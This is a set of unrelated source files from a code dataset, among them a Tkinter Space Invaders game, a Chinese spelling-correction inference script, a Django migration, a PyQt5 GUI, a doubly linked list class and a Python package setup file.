self.canvas.delete(self.boutton_debut_w)\n self.boutton_debut.destroy()\n self.lecture=False\n self.boutton_score.destroy()\n self.canvas.delete(self.boutton_score_w)\n self.boutton_quit=Button(self.canvas,text=\"Quitter\",font=(\"Arial\", 10),bg=\"red\",fg=\"blue\", command=self.quit)\n self.boutton_quit_w=self.canvas.create_window(self.width/30,self.height/30, window=self.boutton_quit)\n self.canvas.delete(self.label_Consigne)\n self.actif=True\n self.musique_explo = PlaySound(\"vitup.wav\", SND_FILENAME | SND_ASYNC)\n self.defender.install_in(self.canvas)\n self.fleet.install_in(self.canvas,self.defender)\n self.class_score.install_in()\n self.defender_present=True\n \n\n def quit(self):\n self.actif=False\n self.fleet.fin()\n self.canvas.after(50,self.quit_action)\n\n def score(self):\n 
#print(\"ici\")\n try:\n \n self.joueur_score=self.resultat.fromFile(\"resultat.json\")\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=self.joueur_score, font=(\"Arial\", 20),fill=\"red\", )\n #print(self.joueur_score)\n except:\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=\"Aucun score d'enregistré\", font=(\"Arial\", 20),fill=\"red\", )\n self.R1.destroy()\n self.R2.destroy()\n self.R3.destroy()\n self.canvas.delete(self.R1_w)\n self.canvas.delete(self.R2_w)\n self.canvas.delete(self.R3_w)\n self.RChoix1.destroy()\n self.RChoix2.destroy()\n self.canvas.delete(self.RChoix1_w)\n self.canvas.delete(self.RChoix2_w)\n self.boutton_score.destroy()\n self.canvas.delete(self.boutton_debut_w)\n self.canvas.delete(self.Label_Titre)\n self.canvas.delete(self.label_bunker)\n self.boutton_debut.destroy()\n self.boutton_score=Button(self.canvas,text=\"Retour\",font=(\"Arial\", 20),bg=\"red\",fg=\"blue\", command=self.titre)\n self.boutton_score_w=self.canvas.create_window(self.width/2,self.height/1.05, window=self.boutton_score)\n self.boutton_reset_score=Button(self.canvas,text=\"Réinitialiser les scores\",font=(\"Arial\", 10),bg=\"red\",fg=\"blue\", command=self.suppr_score)\n self.boutton_reset_score_w=self.canvas.create_window(self.width/2+200,self.height/1.05, window=self.boutton_reset_score)\n self.ecrire.destroy()\n self.canvas.delete(self.label_Consigne)\n \n \n def suppr_score(self):\n try:\n\n os.remove(\"resultat.json\")\n self.canvas.delete(self.label_gg)\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=\"Scores supprimés\", font=(\"Arial\", 20),fill=\"red\", )\n self.joueur_score.suppr()\n\n except:\n self.canvas.delete(self.label_gg)\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=\"Il n'y a aucun score a effacer\", font=(\"Arial\", 20),fill=\"red\", )\n\n\n def keypress(self, event):\n x = 0\n\n \n \n if event.keysym == 'Left': \n if self.defender_present==True:\n\n x = -30\n self.defender.move_in(self.canvas, x)\n elif event.keysym == 'Right': \n if self.defender_present==True:\n\n x = 30\n self.defender.move_in(self.canvas, x)\n \n if event.keysym == 'space': \n \n if self.defender_present==True:#permet d'éviter des erreurs lorsque le defender nest pas initialisé\n\n self.defender.fire(self.canvas)\n\n\n def quit_action(self):\n try:\n \n self.boutton_quit.destroy()\n except:\n None\n if self.defender_present==True:\n self.defender_present=False\n self.defender.destruction(self.canvas)\n if self.defaite==True:#si on est déja sur l'écran de defaite on le rapelle afin de supprimer ses éléments et de retourner a l'écran titre \n self.perdu()\n def start_animation(self):\n\n self.start()\n def Winn(self):\n self.fleet.supr_bunker()\n if self.defender_present==True:\n self.defender_present=False\n self.defender.destruction(self.canvas)\n self.win = PhotoImage(file='Victoire.gif').zoom(2)\n self.carrey=self.canvas.create_image(self.width/2, self.height/2, image=self.win)\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=\"Victoire\", font=(\"Arial\", 40),fill=\"red\", )\n self.label_score=self.canvas.create_text(self.width/2.5,self.height/4,text=\"Le score de \"+str(self.pseudo.get())+\" est de :\"+str(self.defender.point)+\" points\", font=(\"Arial\", 25),fill=\"green\", )\n #print(self.defender.point)\n self.musique_game_over = PlaySound(\"Bravo.wav\", SND_FILENAME | SND_ASYNC)\n try:\n \n self.joueur_score=self.resultat.fromFile(\"resultat.json\")\n #print(\"les 
calculs ne sont pas bon kevin\")\n except:\n None\n self.joueur_score.ajout(Score(self.pseudo.get(),self.defender.point))\n self.joueur_score.toFile(\"resultat.json\")\n \n self.Winn_play()\n \n def Winn_play(self):\n if self.nb==12:\n self.nb=0\n if self.actif== True:\n\n \n img_nb = \"gif -index \" + str(self.nb) #recupere le numéro d'une image du gif de l'explosion\n self.nb+=1\n self.win = PhotoImage(file = 'Victoire.gif', format = img_nb) #recupere l'image de l'explosion\n self.canvas.itemconfigure(self.carrey, image=self.win)\n self.canvas.after(50,self.Winn_play)\n else:\n self.canvas.delete(self.label_score)\n self.canvas.delete(self.win)\n self.canvas.delete(self.carrey)\n self.canvas.delete(self.label_gg)\n self.titre()\n \n def perdu(self):\n \n if self.actif== True:\n self.fleet.supr_bunker()\n if self.defender_present==True:\n self.defender_present=False\n self.defender.destruction(self.canvas)\n self.musique_game_over = PlaySound(\"gameover.wav\", SND_FILENAME | SND_ASYNC)\n #print(\"on passe par ici\")\n self.defaite= True\n self.loose = PhotoImage(file='Tnul.png').zoom(1).subsample(2)\n self.nul=self.canvas.create_image(200, 200, image=self.loose)\n self.label_perdu=self.canvas.create_text(self.width/2,self.height/2,text=\"Perdu !\", font=(\"Arial\", 40),fill=\"red\", )\n self.label_retour=self.canvas.create_text(self.width/2,self.height/4,text=\"Essaye encore\", font=(\"Arial\", 40),fill=\"red\", )\n \n \n else:\n #print(\"on passe par la\")\n self.defaite= False\n self.canvas.delete(self.label_perdu)\n self.canvas.delete(self.label_retour)\n self.canvas.delete(self.loose)\n self.canvas.delete(self.nul)\n\n self.titre() \n\n \nclass SpaceInvaders(object): \n ''' Main Game class '''\n\n def __init__(self): \n self.root = tk.Tk()\n self.root.title(\"Space Invaders\")\n width=800\n height=600\n self.frame=tk.Frame(self.root,width=width, height=height,bg=\"green\")\n self.frame.pack()\n self.game = Game(self.frame)\n \n def play(self): \n self.game.start_animation()\n self.root.mainloop() \n \njeu=SpaceInvaders()\njeu.play()","sub_path":"PythonApplication1/PythonApplication1.py","file_name":"PythonApplication1.py","file_ext":"py","file_size_in_byte":40104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"398285964","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:XuMing(xuming624@qq.com), Abtion(abtion@outlook.com)\n@description: \n\"\"\"\nimport sys\nimport operator\nimport torch\nfrom transformers import BertTokenizer\n\nsys.path.append('../..')\n\nfrom pycorrector.macbert.macbert4csc import MacBert4Csc\nfrom pycorrector.macbert.softmaskedbert4csc import SoftMaskedBert4Csc\nfrom pycorrector.macbert.defaults import _C as cfg\nfrom pycorrector.utils.logger import logger\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass Inference:\n def __init__(self, ckpt_path='output/macbert4csc/epoch=09-val_loss=0.01.ckpt',\n vocab_path='output/macbert4csc/vocab.txt',\n cfg_path='train_macbert4csc.yml'):\n logger.debug(\"device: {}\".format(device))\n self.tokenizer = BertTokenizer.from_pretrained(vocab_path)\n cfg.merge_from_file(cfg_path)\n if 'macbert4csc' in cfg_path:\n self.model = MacBert4Csc.load_from_checkpoint(checkpoint_path=ckpt_path,\n cfg=cfg,\n map_location=device,\n tokenizer=self.tokenizer)\n elif 'softmaskedbert4csc' in cfg_path:\n self.model = SoftMaskedBert4Csc.load_from_checkpoint(checkpoint_path=ckpt_path,\n cfg=cfg,\n map_location=device,\n tokenizer=self.tokenizer)\n else:\n 
raise ValueError(\"model not found.\")\n\n        self.model.eval()\n        self.model.to(device)\n        logger.debug(\"device: {}\".format(device))\n\n    def predict(self, sentence_list):\n        \"\"\"\n        Predict with the text error-correction model\n        Args:\n            sentence_list: list\n                list of input texts\n        Returns: tuple\n            corrected_texts(list)\n        \"\"\"\n        is_str = False\n        if isinstance(sentence_list, str):\n            is_str = True\n            sentence_list = [sentence_list]\n        corrected_texts = self.model.predict(sentence_list)\n        if is_str:\n            return corrected_texts[0]\n        return corrected_texts\n\n    def predict_with_error_detail(self, sentence_list):\n        \"\"\"\n        Predict with the text error-correction model, returning error-position details\n        Args:\n            sentence_list: list\n                list of input texts\n        Returns: tuple\n            corrected_texts(list), details(list)\n        \"\"\"\n        details = []\n        is_str = False\n        if isinstance(sentence_list, str):\n            is_str = True\n            sentence_list = [sentence_list]\n        corrected_texts = self.model.predict(sentence_list)\n\n        def get_errors(corrected_text, origin_text):\n            sub_details = []\n            for i, ori_char in enumerate(origin_text):\n                if ori_char in [' ', '“', '”', '‘', '’', '琊', '\\n', '…', '—', '擤']:\n                    # add unk word\n                    corrected_text = corrected_text[:i] + ori_char + corrected_text[i:]\n                    continue\n                if i >= len(corrected_text):\n                    continue\n                if ori_char != corrected_text[i]:\n                    if ori_char.lower() == corrected_text[i]:\n                        # pass english upper char\n                        corrected_text = corrected_text[:i] + ori_char + corrected_text[i + 1:]\n                        continue\n                    sub_details.append((ori_char, corrected_text[i], i, i + 1))\n            sub_details = sorted(sub_details, key=operator.itemgetter(2))\n            return corrected_text, sub_details\n\n        for corrected_text, text in zip(corrected_texts, sentence_list):\n            corrected_text, sub_details = get_errors(corrected_text, text)\n            details.append(sub_details)\n        if is_str:\n            return corrected_texts[0], details[0]\n        return corrected_texts, details\n\n\nif __name__ == \"__main__\":\n    ckpt_path = sys.argv[1]\n    vocab_path = sys.argv[2]\n    cfg_path = sys.argv[3]\n    m = Inference(ckpt_path,\n                  vocab_path,\n                  cfg_path)\n    inputs = [\n        '它的本领是呼风唤雨,因此能灭火防灾。狎鱼后面是獬豸。獬豸通常头上长着独角,有时又被称为独角羊。它很聪彗,而且明辨是非,象征着大公无私,又能镇压斜恶。',\n        '老是较书。',\n        '感谢等五分以后,碰到一位很棒的奴生跟我可聊。',\n        '遇到一位很棒的奴生跟我聊天。',\n        '遇到一位很美的女生跟我疗天。',\n        '他们只能有两个选择:接受降新或自动离职。',\n        '王天华开心得一直说话。',\n        '你说:“怎么办?”我怎么知道?',\n    ]\n    outputs = m.predict(inputs)\n    for a, b in zip(inputs, outputs):\n        print('input :', a)\n        print('predict:', b)\n        print()\n\n    # evaluate the model on the sighan2015 dataset\n    # macbert4csc Sentence Level: acc:0.7845, precision:0.8174, recall:0.7256, f1:0.7688, cost time:10.79 s\n    # softmaskedbert4csc Sentence Level: acc:0.6964, precision:0.8065, recall:0.5064, f1:0.6222, cost time:16.20 s\n    from pycorrector.utils.eval import eval_sighan2015_by_model\n\n    eval_sighan2015_by_model(m.predict_with_error_detail)\n","sub_path":"pycorrector/macbert/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"498627618","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Checkout',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n                ('is_reservation', models.BooleanField(default=False)),\n                ('start_date', models.DateField()),\n                ('due_date', models.DateField(null=True)),\n                ('date_returned', 
models.DateField(null=True, blank=True)),\n ('late_fee_paid', models.BooleanField(default=False)),\n ('customer', models.ForeignKey(to=settings.AUTH_USER_MODEL, related_name='checkouts')),\n ('employee', models.ForeignKey(related_name='employee_checkouts', to=settings.AUTH_USER_MODEL, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Movie',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('name', models.CharField(max_length=1000)),\n ('year', models.IntegerField()),\n ('imdb_id', models.CharField(null=True, max_length=100, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='MovieCopy',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('sku', models.CharField(max_length=100)),\n ('movie', models.ForeignKey(to='movies.Movie', related_name='copies')),\n ],\n ),\n migrations.CreateModel(\n name='Person',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('name', models.CharField(max_length=1000)),\n ('imdb_id', models.CharField(null=True, max_length=100, blank=True)),\n ],\n ),\n migrations.AddField(\n model_name='movie',\n name='actors',\n field=models.ManyToManyField(related_name='movies', to='movies.Person'),\n ),\n migrations.AddField(\n model_name='movie',\n name='director',\n field=models.ForeignKey(related_name='directed', to='movies.Person', null=True),\n ),\n migrations.AddField(\n model_name='checkout',\n name='movie',\n field=models.ForeignKey(to='movies.MovieCopy', related_name='checkouts'),\n ),\n ]\n","sub_path":"movies/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319387015","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nfrom PIL.ImageQt import ImageQt\r\nimport sys,image_create,export_file,file_database\r\n\r\nclass Button(QPushButton):\r\n\r\n def __init__(self,parent,text):\r\n super().__init__(parent)\r\n self.text = text\r\n \r\n \r\nclass TreeView(QTreeView):\r\n\r\n def __init__(self,parent):\r\n super().__init__(parent)\r\n super().setHeaderHidden(True)\r\n\r\nclass Item(QStandardItem):\r\n\r\n def __init__(self,text = \"\",color = QColor(Qt.black),fontSize = 20):\r\n super().__init__()\r\n font = QFont(\"Times New Roman\",fontSize)\r\n self.setEditable(False)\r\n self.setFont(font)\r\n self.setText(text)\r\n\r\nclass TreeModel(QStandardItemModel):\r\n\r\n def __init__(self,parent):\r\n super().__init__(parent)\r\n self.root_node = super().invisibleRootItem\r\n\r\nclass Header :\r\n\r\n def __init__(self,user_name):\r\n self.user_image = ImageQt(image_create.user_image(user_name,\"darkblue\"))\r\n \r\nclass PublicPage(QWidget):\r\n\r\n switch_window = pyqtSignal()\r\n\r\n def __init__(self,user_name):\r\n self.my_database = file_database.File_database()\r\n super().__init__()\r\n self.user_name = user_name\r\n self.run_out = True\r\n self.init_ui()\r\n\r\n def init_ui(self):\r\n self.setWindowTitle(\"File transfer system\")\r\n self.center()\r\n self.set_gui()\r\n \r\n \r\n\r\n def center(self):\r\n frame_geometry = self.frameGeometry()\r\n center_point = QDesktopWidget().availableGeometry().center()\r\n frame_geometry.moveCenter(center_point)\r\n self.move(frame_geometry.topLeft())\r\n\r\n def set_gui(self):\r\n\r\n self.line = 0\r\n\r\n content_button = 
[\"Public\", \"Inbox\", \"Send\", \"Export\", \"Import\",\"Log out\"]\r\n self.global_object = []\r\n self.header_image = self.image(Header(self.user_name).user_image)\r\n self.vertical_layout = QVBoxLayout()\r\n self.vertical_layout.addWidget(self.header_image)\r\n\r\n self.main_zone = QGridLayout()\r\n for num in range(len(content_button)):\r\n item = Button(self,content_button[num])\r\n item.setStyleSheet(\"background-color : rgb(0,255,0);\")\r\n item.setText(item.text)\r\n if item.text == \"Log out\" :\r\n self.global_object.append(item)\r\n self.check_item(item)\r\n self.main_zone.addWidget(item,num*2,0,2,2)\r\n self.line += num\r\n\r\n self.main_zone.addWidget(TreeView(self),0,3,2*len(content_button),2*len(content_button))\r\n \r\n find_label = QLabel()\r\n find_label.setText(\"find : \")\r\n find_label.setAlignment(Qt.AlignCenter)\r\n self.main_zone.addWidget(find_label,self.line+1,0,2,2)\r\n self.main_zone.addWidget(QLineEdit(self),self.line+1,3,2,2*(len(content_button)-1))\r\n\r\n self.search_button_function_name = [\"----->\",\"Reset\"]\r\n \r\n for num in range(len(self.search_button_function_name)):\r\n item = Button(self,self.search_button_function_name[num])\r\n item.setStyleSheet(\"background-color : rgb(0,255,100);\")\r\n item.setText(item.text)\r\n self.check_item(item)\r\n self.main_zone.addWidget(item,self.line+1,3+2*(len(content_button)-1)+num,1,1)\r\n \r\n \r\n self.vertical_layout.addLayout(self.main_zone)\r\n self.setLayout(self.vertical_layout)\r\n\r\n def image(self,picture):\r\n self.new_image = QLabel(\"\",self)\r\n new_image = QPixmap.fromImage(picture)\r\n self.new_image.setPixmap(new_image.scaled(new_image.width()//2,new_image.height()//2))\r\n self.new_image.setSizePolicy(QSizePolicy.Preferred,QSizePolicy.Preferred)\r\n self.new_image.setAlignment(Qt.AlignCenter)\r\n return self.new_image\r\n\r\n def check_item(self,item):\r\n if item.text == \"Export\" :\r\n item.clicked.connect(self.export)\r\n elif item.text == \"Log out\":\r\n item.clicked.connect(self.logout)\r\n def export(self):\r\n self.dialog = export_file.ExportForm(self.user_name)\r\n self.dialog.my_database = self.my_database\r\n\r\n def logout(self):\r\n self.run_out = False\r\n self.switch_window.emit()\r\n print(\"LogOut Complete\")\r\n\r\n def closeEvent(self,event):\r\n\r\n if self.run_out :\r\n sys.exit()\r\n\r\n \r\n \r\n \r\n","sub_path":"update/19_10_63/index_page.py","file_name":"index_page.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"649400869","text":"# -*- coding: utf-8 -*-\nfrom .__module__ import Module, dependency, source\nfrom .python import Python\nfrom .pytorch import Pytorch\n\n\n@dependency(Python, Pytorch)\n@source('git')\nclass Apex(Module):\n\n def build(self):\n return r'''\n RUN $GIT_CLONE https://github.com/NVIDIA/apex.git && \\\n cd apex && \\\n pip install -v --no-cache-dir --global-option=\"--cpp_ext\" --global-option=\"--cuda_ext\" ./\n '''\n","sub_path":"generator/modules/apex.py","file_name":"apex.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"485743475","text":"import pandas as pd\nimport os\nfrom re import search\nfrom re import IGNORECASE\n\ndef get_filename_from_line(line):\n first_word = line.split('>')[0]\n filename_word = first_word.split('\\\\\\\\')[-1]\n return filename_word + \".txt\"\n\ndef any_harassment_keyword_in_line(line):\n harassment_keywords = 
[\"hanky panky\", \"fondle\", \"title ix\"]\n for keyword in harassment_keywords:\n if search(keyword, line, IGNORECASE):\n return True\n\n return False\n\ndef main():\n interviews_df = pd.read_csv(\"interviews.csv\")\n interviewees_df = pd.read_csv(\"interviewees.csv\")\n # Parse the .txt file, creating map from filenames to text content\n filenames_to_event_extent_dict = {}\n with open(\"Event (Extent).txt\", encoding=\"utf-8\") as fp:\n text_lines = fp.readlines()\n current_filename = \"\"\n for line in text_lines:\n if \"Reliability Subcorpus\" in line:\n current_filename = \"Reliability\"\n elif \" 0:\n f.write(current_filename + \" - \" + str(filename_to_decade_dict[current_filename]) + \"\\n\")\n for line in harassment_lines:\n f.write(line)\n\n f.close()\n\n print(\"Harassment filenames total: \" + str(harassment_total))\n\n #Consolidate the text\n f = open(\"event_extent_harassment.txt\", \"a+\", encoding=\"utf-8\")\n for filename in os.listdir(\"Sorted Text/\"):\n with open(\"Sorted Text/\" + filename, encoding=\"utf-8\") as fp:\n all_lines = fp.readlines()\n for line in all_lines:\n f.write(line)\n f.close()\n\nif __name__ == '__main__':\n main()","sub_path":"Event (Extent) Processing/sort_extent_by_birth_decade_harassment.py","file_name":"sort_extent_by_birth_decade_harassment.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"193358124","text":"class Node:\r\n\r\n def __init__(self, data):\r\n self.prev = None\r\n self.data = data\r\n self.next = None\r\n\r\n @staticmethod\r\n def display(S_Id):\r\n print(\"Student id = \", S_Id)\r\n\r\n\r\nclass doublyLinkedlist:\r\n\r\n def __init__(self):\r\n self.start = None\r\n\r\n def getLength(self):\r\n if self.start is not None:\r\n count = 1\r\n ptr = self.start\r\n while ptr.next is not None:\r\n count = count + 1\r\n ptr = ptr.next\r\n print(count)\r\n return count\r\n else:\r\n print(\"Linked List is Empty\")\r\n return 0\r\n\r\n def traversing(self):\r\n ptr = self.start\r\n if ptr is None:\r\n print(\"Empty List \")\r\n else:\r\n while ptr is not None:\r\n print(f\"{ptr.prev}\\t{ptr.data}\\t{ptr.next}\\t{ptr}\")\r\n # print(ptr.data)\r\n ptr = ptr.next\r\n\r\n def searching(self, value):\r\n ptr = self.start\r\n count = 1\r\n while ptr is not None:\r\n if ptr.data == value:\r\n return count\r\n else:\r\n ptr = ptr.next\r\n count = count + 1\r\n return -1\r\n\r\n def insertBegin(self, newNode):\r\n newNode.prev = None\r\n newNode.next = self.start\r\n self.start.prev = newNode\r\n self.start = newNode\r\n\r\n def insertBeforenode(self, targetNode, newNode):\r\n flag = self.searching(targetNode.data)\r\n if flag != -1:\r\n if targetNode != self.start:\r\n ptr = self.start\r\n prevPtr = None\r\n while ptr != targetNode:\r\n prevPtr = ptr\r\n ptr = ptr.next\r\n prevPtr.next = newNode\r\n newNode.prev = prevPtr\r\n ptr.prev = newNode\r\n newNode.next = ptr\r\n else:\r\n self.insertBegin(newNode)\r\n else:\r\n print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n def insertAfternode(self, targetNode, newNode):\r\n flag = self.searching(targetNode.data)\r\n if flag != -1:\r\n ptr = self.start\r\n while ptr.next is not None:\r\n ptr = ptr.next\r\n if targetNode != ptr:\r\n ptr = self.start\r\n nextPtr = ptr.next\r\n while ptr != targetNode:\r\n ptr = ptr.next\r\n nextPtr = ptr.next\r\n nextPtr.prev = newNode\r\n newNode.next = nextPtr\r\n ptr.next = newNode\r\n newNode.prev = ptr\r\n elif targetNode == ptr:\r\n 
self.insertEnd(newNode)\r\n        else:\r\n            print(\"Error: Target node is not present in the list.\")\r\n\r\n    def insertEnd(self, newNode):\r\n        if self.start is not None:\r\n            newNode.next = None\r\n            ptr = self.start\r\n            while ptr.next is not None:\r\n                ptr = ptr.next\r\n            ptr.next = newNode\r\n            newNode.prev = ptr\r\n        else:\r\n            # The list is empty, so the new node becomes the start node.\r\n            newNode.prev = None\r\n            newNode.next = None\r\n            self.start = newNode\r\n\r\n    def delete_startNode(self):\r\n        if self.start is not None:\r\n            ptr = self.start\r\n            self.start = ptr.next\r\n            if self.start is not None:\r\n                self.start.prev = None  # guard: the deleted node may have been the only one\r\n        else:\r\n            print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n    def delete_node_before(self, targetNode):\r\n        flag = self.searching(targetNode.data)\r\n        if flag > 2:\r\n            ptr = self.start\r\n            prevPtr = ptr\r\n            nextPtr = ptr.next\r\n            while nextPtr != targetNode:\r\n                prevPtr = ptr\r\n                ptr = ptr.next\r\n                nextPtr = ptr.next\r\n            prevPtr.next = nextPtr\r\n            nextPtr.prev = prevPtr\r\n        elif flag == 1:\r\n            print(\"Error: There is no node before this node. Hence, deletion can't be performed.\")\r\n        elif flag == 2:\r\n            self.delete_startNode()\r\n        elif flag == -1:\r\n            print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n    def delete_node_after(self, targetNode):\r\n        flag = self.searching(targetNode.data)\r\n        length = self.getLength()\r\n        if flag != -1:\r\n            if flag < length - 1:\r\n                ptr = self.start\r\n                prevPtr = ptr\r\n                nextPtr = ptr.next\r\n                while prevPtr != targetNode:\r\n                    prevPtr = ptr\r\n                    ptr = ptr.next\r\n                    nextPtr = ptr.next\r\n                prevPtr.next = nextPtr\r\n                nextPtr.prev = prevPtr\r\n            elif flag == length - 1:\r\n                self.delete_endNode()\r\n            elif flag == length:\r\n                print(\"Error: There is no node present after this. Hence, deletion operation can't be performed.\")\r\n        else:\r\n            print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n    def delete_endNode(self):\r\n        if self.start is not None:\r\n            ptr = self.start\r\n            if ptr.next is None:\r\n                self.start = None  # the only node is removed, leaving an empty list\r\n            else:\r\n                prevPtr = self.start\r\n                while ptr.next is not None:\r\n                    prevPtr = ptr\r\n                    ptr = ptr.next\r\n                prevPtr.next = None\r\n        else:\r\n            print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n\r\nstudent1 = Node('A')\r\nstudent2 = Node('B')\r\nstudent3 = Node('C')\r\nstudent1.next = student2\r\nstudent1.prev = None\r\nstudent2.next = student3\r\nstudent2.prev = student1\r\nstudent3.next = None\r\nstudent3.prev = student2\r\n\r\nsciClass = doublyLinkedlist()\r\nsciClass.start = student1\r\nprint(\"\\t\\t\\t\\t\\t ptr.prev \\t\\t\\t\\t\\t ptr.data \\t\\t\\t\\t\\t ptr.next \\t\\t\\t\\t\\t ptr\")\r\nsciClass.traversing()\r\nprint(\"\tInserting at beginning!!! \")\r\nstudent4 = Node('D')\r\nstudent9 = Node('I')\r\nsciClass.insertBegin(student4)\r\nsciClass.traversing()\r\nprint(\"\tInserting at beginning using before method!!! \")\r\nsciClass.insertBeforenode(student4, student9)\r\nsciClass.traversing()\r\nprint(\"\tInserting at ending!!!\")\r\nstudent5 = Node('E')\r\nsciClass.insertEnd(student5)\r\nsciClass.traversing()\r\nprint(\"\tInserting before node!!! 
\")\r\nstudent6 = Node('F')\r\nsciClass.insertBeforenode(student1, student6)\r\nsciClass.traversing()\r\nprint(\" \\tInserting after node!!!\")\r\nstudent7 = Node('G')\r\nsciClass.insertAfternode(student3, student7)\r\nsciClass.traversing()\r\nprint(\"\\tInserting last node using after method!!!\")\r\nstudent8 = Node('H')\r\nsciClass.insertAfternode(student5, student8)\r\nsciClass.traversing()\r\n\r\nprint(\"\\tDeleting starting node!!!\")\r\nsciClass.delete_startNode()\r\n# sciClass.delete_node_before(student2)\r\nsciClass.traversing()\r\nprint(\"\\tDeleting after node!!!\")\r\nsciClass.delete_node_after(student2)\r\nsciClass.traversing()\r\nprint(\"\\tDeleting before node!!!\")\r\nsciClass.delete_node_before(student2)\r\nsciClass.traversing()\r\nprint(\"\\tDeleting ending node!!!\")\r\nsciClass.delete_endNode()\r\nsciClass.traversing()\r\nprint(\"\\tDeleting start node using before method!!!\")\r\nsciClass.delete_node_before(student6)\r\nsciClass.traversing()\r\nprint(\"\\tDeleting last node using after method!!!\")\r\nsciClass.delete_node_after(student7)\r\nsciClass.traversing()\r\nprint(\"\\t End \")\r\n","sub_path":"Data Structures in Python/Linked List/DoublyLinkedLists.py","file_name":"DoublyLinkedLists.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"437956884","text":"from setuptools import setup\n\n\ndef read(fname):\n \"\"\" Return file content. \"\"\"\n with open(fname) as f:\n content = f.read()\n\n return content\n\n\ndescription = 'A simple way to manage your project settings'\ntry:\n long_description = read('README.rst')\nexcept IOError:\n long_description = description\n\nDYNAMIC_SETTINGS_REQUIRES = ['jsonpickle==1.4.1']\nTOML_REQUIRES = ['toml==0.10.1']\nYAML_REQUIRES = ['PyYAML==5.3.1']\nCONSUL_REQUIRES = ['consulate==0.6.0'] + DYNAMIC_SETTINGS_REQUIRES\nDATABASE_REQUIRES = ['SQLAlchemy==1.3.19'] + DYNAMIC_SETTINGS_REQUIRES\nMEMCACHED_REQUIRES = ['pymemcache==3.4.0', 'six==1.15.0'] + DYNAMIC_SETTINGS_REQUIRES # noqa\nREDIS_REQUIRES = ['redis==3.5.3', 'six==1.15.0'] + DYNAMIC_SETTINGS_REQUIRES\nS3_REQUIRES = ['boto3==1.15.6'] + DYNAMIC_SETTINGS_REQUIRES\n\nALL_REQUIRES = set(\n CONSUL_REQUIRES +\n DATABASE_REQUIRES +\n MEMCACHED_REQUIRES +\n REDIS_REQUIRES +\n S3_REQUIRES +\n TOML_REQUIRES +\n YAML_REQUIRES\n)\n\n\ndownload_url = 'https://github.com/drgarcia1986/simple-settings/tarball/master'\n\nsetup(\n name='simple-settings',\n version='1.0.0',\n install_requires=[],\n url='https://github.com/drgarcia1986/simple-settings',\n author='Diego Garcia',\n author_email='drgarcia1986@gmail.com',\n keywords='django flask bottle tornado settings configuration conf',\n description=description,\n long_description=long_description,\n download_url=download_url,\n packages=[\n 'simple_settings',\n 'simple_settings.strategies',\n 'simple_settings.dynamic_settings',\n ],\n package_dir={\n 'simple_settings': 'simple_settings',\n 'strategies': 'simple_settings/strategies',\n 'dynamic_settings': 'simple_settings/dynamic_settings',\n },\n classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n ],\n extras_require={\n 'all': ALL_REQUIRES,\n 'consul': CONSUL_REQUIRES,\n 'database': DATABASE_REQUIRES,\n 'memcached': MEMCACHED_REQUIRES,\n 'redis': REDIS_REQUIRES,\n 's3': S3_REQUIRES,\n 'toml': TOML_REQUIRES,\n 'yaml': YAML_REQUIRES,\n 
